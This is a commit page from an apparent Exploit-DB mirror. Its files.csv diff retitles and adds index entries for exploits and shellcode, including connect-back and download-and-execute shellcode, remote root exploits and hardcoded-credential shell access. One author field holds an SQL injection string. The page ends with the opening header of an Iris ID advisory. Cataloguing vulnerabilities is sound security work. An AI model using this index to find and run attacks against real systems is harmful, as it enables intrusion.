bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-07-27

Browse source 
6 new exploits

Invision Power Board <= 3.0.4_ <= 3.0.4_ <= 2.3.6 - LFI and SQL Injection
Invision Power Board <= 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI and SQL Injection

Linux/x86 - connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes)
Linux/x86 - Connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes)

Linux/x86 - quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)
Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)

Win32 - connectback_ receive_ save and execute shellcode
Win32 - Connectback_ receive_ save and execute shellcode

DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow
DVD X Player 5.5 Professional - (.plf) Universal Buffer Overflow

DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP+ASLR Bypass)
DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)

ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities
ISC BIND <= 8.2.2 / IRIX <= 6.5.17 / Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities

LedgerSMB1.0/1.1_SQL-Ledger 2.6.x Login Parameter Local File Include And Authentication Bypass Vulnerabilities
LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Include And Authentication Bypass Vulnerabilities

Lighttpd <= 1.4.15 - Multiple Code Execution_ Denial of Service and Information Disclosure Vulnerabilities
Lighttpd <= 1.4.15 - Multiple Code Execution + Denial of Service + Information Disclosure Vulnerabilities

Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow
Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Privilege Escalation

Windows TrackPopupMenu Win32k NULL Pointer Dereference
Windows - TrackPopupMenu Win32k NULL Pointer Dereference

ManageEngine OpManager_ Social IT Plus and IT360 - Multiple Vulnerabilities
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities

Wikipad 1.6.0 - Cross-Site Scripting_ HTML Injection and Information Disclosure Vulnerabilities
Wikipad 1.6.0 - Cross-Site Scripting + HTML Injection + Information Disclosure Vulnerabilities

concrete5 5.5.2.1 Information Disclosure_ SQL Injection and Cross Site Scripting Vulnerabilities
concrete5 5.5.2.1 - Information Disclosure + SQL Injection + Cross Site Scripting Vulnerabilities

RuubikCMS 1.1.x Cross Site Scripting_ Information Disclosure and Directory Traversal Vulnerabilities
RuubikCMS 1.1.x - Cross Site Scripting + Information Disclosure + Directory Traversal Vulnerabilities

Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)
Windows Kernel - Win32k.sys Privilege Escalation Exploit (MS14-058)

Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution
Tiki-Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution

PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write
PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write
Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)
PHP File Vault 0.9 - Directory Traversal
Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities
Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution
Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access
This commit is contained in:
Offensive Security 2016-07-27 05:06:35 +00:00
parent d06dff59f9
commit 9680c9c2cb
7 changed files with 1102 additions and 19 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

41
files.csv
View file

@ -9593,7 +9593,7 @@ id,file,description,date,author,platform,type,port
10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb <= 2.3.2 - SQL Injection Exploit",2009-12-04,"cr4wl3r ",php,webapps,0
10303,platforms/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",windows,dos,0
10304,platforms/php/webapps/10304.txt,"Invision Power Board <= 3.0.4_ <= 3.0.4_ <= 2.3.6 - LFI and SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0
10304,platforms/php/webapps/10304.txt,"Invision Power Board <= 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI and SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0
10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 - Multiple File Inclusion Vulnerabilities",2009-12-04,R3VAN_BASTARD,php,webapps,0
10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0
10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0
@ -11813,7 +11813,7 @@ id,file,description,date,author,platform,type,port
13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) /bin/sh shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0
13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0
13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0
13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - Connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0
13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - connect back (Port )8192.send.exit /etc/shadow shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - writes a php connectback shell (/var/www/cb.php) to the filesystem shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
@ -11872,7 +11872,7 @@ id,file,description,date,author,platform,type,port
13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connect-back shellcode 127.0.0.1:31337/TCP (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13397,platforms/lin_x86/shellcode/13397.c,"Linux/x86 - reboot() shellcode (20 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) / PUSH shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0
@ -11992,7 +11992,7 @@ id,file,description,date,author,platform,type,port
13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0
13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB Kernel32.dll ImageBase Finder Alphanumeric shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB Kernel32.dll ImageBase Finder (ASCII Printable) shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
13514,platforms/win_x86/shellcode/13514.asm,"Win32 - connectback_ receive_ save and execute shellcode",2008-08-25,loco,win_x86,shellcode,0
13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback_ receive_ save and execute shellcode",2008-08-25,loco,win_x86,shellcode,0
13515,platforms/win_x86/shellcode/13515.pl,"Win32 - Download and Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",win_x86,shellcode,0
13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Tiny Download and Exec Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0
13517,platforms/win_x86/shellcode/13517.asm,"Win32 - download and execute shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0
@ -15413,14 +15413,14 @@ id,file,description,date,author,platform,type,port
17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0
17743,platforms/php/webapps/17743.rb,"LifeSize Room - Command Injection",2011-08-28,"Spencer McIntyre",php,webapps,0
17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - (.m3u) Universal BoF",2011-08-29,"D3r K0n!G",windows,local,0
17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - (.plf) Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
17748,platforms/php/webapps/17748.txt,"WordPress SH Slideshow plugin <= 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0
17749,platforms/php/webapps/17749.txt,"WordPress iCopyright(R) Article Tools plugin <= 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0
17750,platforms/php/webapps/17750.txt,"WordPress Advertizer plugin <= 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin <= 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0
17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0
17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP+ASLR Bypass)",2011-08-30,sickness,windows,local,0
17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)",2011-08-30,sickness,windows,local,0
17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin <= 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
17756,platforms/php/webapps/17756.txt,"WordPress Plugin audio gallery playlist <= 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin <= 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
@ -16983,7 +16983,7 @@ id,file,description,date,author,platform,type,port
19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0
19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,Metasploit,windows,remote,3460
19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0
19615,platforms/unix/dos/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,dos,0
19615,platforms/unix/dos/19615.c,"ISC BIND <= 8.2.2 / IRIX <= 6.5.17 / Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,dos,0
19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0
19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow",1999-11-11,"Ussr Labs",windows,remote,0
19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0
@ -26800,7 +26800,7 @@ id,file,description,date,author,platform,type,port
29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 users.php user_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 news.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 gallery.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1_SQL-Ledger 2.6.x Login Parameter Local File Include And Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0
29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Include And Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0
29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0
29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0
29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 profile.php showuser Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0
@ -27252,7 +27252,7 @@ id,file,description,date,author,platform,type,port
30319,platforms/linux/remote/30319.c,"tcpdump Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,linux,remote,0
30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 deletecomment.php id Variable Remote Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0
30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 deleteblog.php id Variable Remote Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0
30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 - Multiple Code Execution_ Denial of Service and Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0
30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 - Multiple Code Execution + Denial of Service + Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0
30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 install/upgrade-0-2-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0
30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 install/upgrade-0-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0
30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 - wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0
@ -30877,7 +30877,7 @@ id,file,description,date,author,platform,type,port
34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 - 'install1.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0
34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution",2010-07-05,"Luigi Auriemma",multiple,remote,0
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Privilege Escalation",2014-08-05,"ryujin & sickness",windows,local,0
34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80
34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0
34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos,0
@ -31624,12 +31624,12 @@ id,file,description,date,author,platform,type,port
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,Metasploit,windows,local,0
35101,platforms/windows/local/35101.rb,"Windows - TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,Metasploit,windows,local,0
35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Blind SQL Injection (Pre-Auth)",2014-10-28,tintinweb,php,webapps,80
35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0
35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0
35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) Buffer Overflow/DoS EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0
35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager_ Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0
35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0
35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross-Site Scripting",2010-12-11,MustLive,php,webapps,0
35107,platforms/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0
35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 - 'tags.php' Cross-Site Scripting",2010-12-12,TEAMELITE,php,webapps,0
@ -31849,7 +31849,7 @@ id,file,description,date,author,platform,type,port
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0
35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0
35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting_ HTML Injection and Information Disclosure Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting + HTML Injection + Information Disclosure Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection",2011-02-16,"Jimmy Bandit",multiple,remote,0
35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 - 'admin/upload-ajax.php' Remote Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0
@ -33488,7 +33488,7 @@ id,file,description,date,author,platform,type,port
37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0
37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0
37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0
37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 Information Disclosure_ SQL Injection and Cross Site Scripting Vulnerabilities",2012-04-26,"Jakub Galczyk",php,webapps,0
37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 - Information Disclosure + SQL Injection + Cross Site Scripting Vulnerabilities",2012-04-26,"Jakub Galczyk",php,webapps,0
37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
37106,platforms/php/webapps/37106.txt,"WordPress Video Gallery Plugin 2.8 Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80
@ -33635,7 +33635,7 @@ id,file,description,date,author,platform,type,port
37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0
37306,platforms/linux/dos/37306.txt,"Mosh Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos,0
37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0
37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x Cross Site Scripting_ Information Disclosure and Directory Traversal Vulnerabilities",2012-05-23,AkaStep,php,webapps,0
37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross Site Scripting + Information Disclosure + Directory Traversal Vulnerabilities",2012-05-23,AkaStep,php,webapps,0
37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Include",2012-05-23,AkaStep,php,webapps,0
37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
@ -35878,7 +35878,7 @@ id,file,description,date,author,platform,type,port
39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
39666,platforms/windows/local/39666.txt,"Windows Kernel - Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
39667,platforms/jsp/webapps/39667.txt,"Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities",2016-04-06,LiquidWorm,jsp,webapps,80
39668,platforms/php/webapps/39668.txt,"SocialEngine 4.8.9 - SQL Injection",2016-04-06,"High-Tech Bridge SA",php,webapps,80
39669,platforms/linux/dos/39669.txt,"Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
@ -36081,7 +36081,7 @@ id,file,description,date,author,platform,type,port
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0
39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
@ -36308,10 +36308,15 @@ id,file,description,date,author,platform,type,port
40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter+ASLR bypass)",2016-07-25,"Karn Ganeshen",windows,local,0
40153,platforms/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,php,webapps,80
40154,platforms/php/webapps/40154.txt,"PHP gettext (gettext.php) 1.0.12 - Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0
40155,platforms/php/dos/40155.txt,"PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80
40155,platforms/php/dos/40155.py,"PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80
40156,platforms/cgi/webapps/40156.py,"Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80
40157,platforms/cgi/webapps/40157.py,"Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80
40158,platforms/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0
40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23

Can't render this file because it is too large.

149
platforms/cgi/webapps/40165.txt Executable file
View file

@ -0,0 +1,149 @@

Iris ID IrisAccess ICU 7000-2 Multiple XSS and CSRF Vulnerabilities
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
Affected version: ICU Software: 1.00.08
ICU OS: 1.3.8
ICU File system: 1.3.8
EIF Firmware [Channel 1]: 1.9
EIF Firmware [Channel 2]: 1.9
